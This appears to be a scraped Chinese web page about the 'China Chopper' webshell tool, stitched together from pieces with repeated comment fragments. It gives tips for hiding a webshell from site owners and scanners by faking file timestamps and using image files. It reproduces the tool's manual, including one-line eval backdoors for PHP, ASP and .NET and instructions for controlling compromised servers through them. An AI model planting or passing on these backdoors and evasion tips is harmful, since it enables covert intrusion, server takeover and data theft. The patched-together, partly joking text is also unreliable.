渗透工具中国菜刀有什么用(菜刀渗透教程)

今日体育 2022年07月11日

本文目录一览:

如何利用中国菜刀来隐藏webshell

如果不在同目录请使用跳转符号.然后修改asp文件的上传 修改时间 改成跟网站里asp文件一致就可以了.这样一般是发现不了你的shell的.因为你建特殊文件

名.带点符号文件夹.如果网站拥有者是服务器权限你这些根本无处遁形。所以还是图片的方式好.扫描程序又扫描不到。用菜刀管理起来还方便.菜刀官方好像不提供下载了.难道要收费? 这边提供一个

菜刀的下载链接 有需要的朋友去下载吧.把你们的webshell都换成一句话吧.不然你们的shell跟人家是公用的了

中国菜刀是一种常见的工具,请问它是一种

它是一种实用工具,借助它将能更好地达到人们想达到的目的。

中国菜刀是什么软件

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。

只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等],都可以用中国菜刀来进行管理!

常用功能:

文件管理,虚拟终端,数据库管理。

其它功能:

WEB浏览器(POST浏览/自定义COOKIE浏览/自定义JS)

网站爬行(自动保存目录结构)

网站安全扫描。

在非简体中文环境下使用,自动切换到英文界面。

中国菜刀的功能介绍:

只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。

UINCODE方式编译,支持多国语言输入显示。

一、EVAL客户端部分

1)要了解的

服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。

支持的服务端脚本:PHP, ASP,NET。

在服务端运行的代码如下:

PHP: ?php @eval($_POST['pass']);?

ASP: %eval request(pass)%

.NET: %@ Page Language=Jscript%%eval(Request.Item[pass],unsafe);%

(注意: .NET要单独一个文件或此文件也是Jscript语言)

2)怎么用

在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。

1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)

3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)

注意:由于服务器的安全设置,某些功能可能不能正常使用。

3) 关于配置信息怎么填?

A) 数据库方面:

PHP脚本:

T类型/T 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种

H主机地址H 主机地址可为机器名或IP地址,如localhost

U数据库用户/U 连接数据库的用户名,如root

P数据库密码/P 连接数据库的密码,如123455

ASP和.NET脚本:

T类型/T 类型只能填ADO

CADO配置信息/C

ADO连接各种数据库的方式不一样。如MSSQL的配置信息为

Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456

B) 其它方面:

添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass']);}

Oaction=test/O

提交功能前先POST额外的数据包:会话期间只提交一次。

DATAuid=user1pwd=123456/DATA

二、网站蜘蛛

织出一张网站的目录结构。

下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。

三、定时提醒

当闹钟事使吧, 周期:每月/每周/每日/只一次。

四、快速启动

一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。

五、浏览器

地址栏输入HELP,更多精彩后续加入。

六、其它部分

等待加入。

附带工具

update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。

把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb

把菜刀的数据库db.mdb替换掉即可。

中国菜刀使用教程

用你的右手,捂住刀柄,刀的锋利处,对准你自己,用力一砍,你将成为第一个会使用中国菜刀的人(注意,日本武士道的切腹就是仿照中国菜刀的使用方法)

挖掘鸡,中国菜刀,抓包......是什么东西啊?

抓包也叫嗅探,简单的说就是对网络数据进行截获,上网时和服务器的交换数据

我来说两句
黑客技术 2年前 (2022-07-12) | 回复
加密存储的。五、浏览器地址栏输入HELP,更多精彩后续加入。六、其它部分等待加入。附带工具update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb
黑客技术 2年前 (2022-07-11) | 回复
能就是你把语言编码选错了。1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)3.数据库管理:[特色]图形界面,支持MYSQL
黑客技术 2年前 (2022-07-11) | 回复
H主机地址H 主机地址可为机器名或IP地址,如localhostU数据库用户/U 连接数据库的用户名,如rootP数据库密码/P 连接数据库的密码,如123455ASP和.NET脚本:T类型/T 类型只能填ADOCADO配置信息/CADO连接各种数据库的方式不一样。如MSSQL的配置信息为Dri
黑客技术 2年前 (2022-07-11) | 回复
服务端脚本:PHP, ASP,NET。在服务端运行的代码如下:PHP: ?php @eval($_POST['pass']);?ASP: %eval request(p
黑客技术烟雨中1 2年前 (2022-07-12) | 回复
码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;2.虚拟终端:[特色]人性化的设计,操作方便;(输入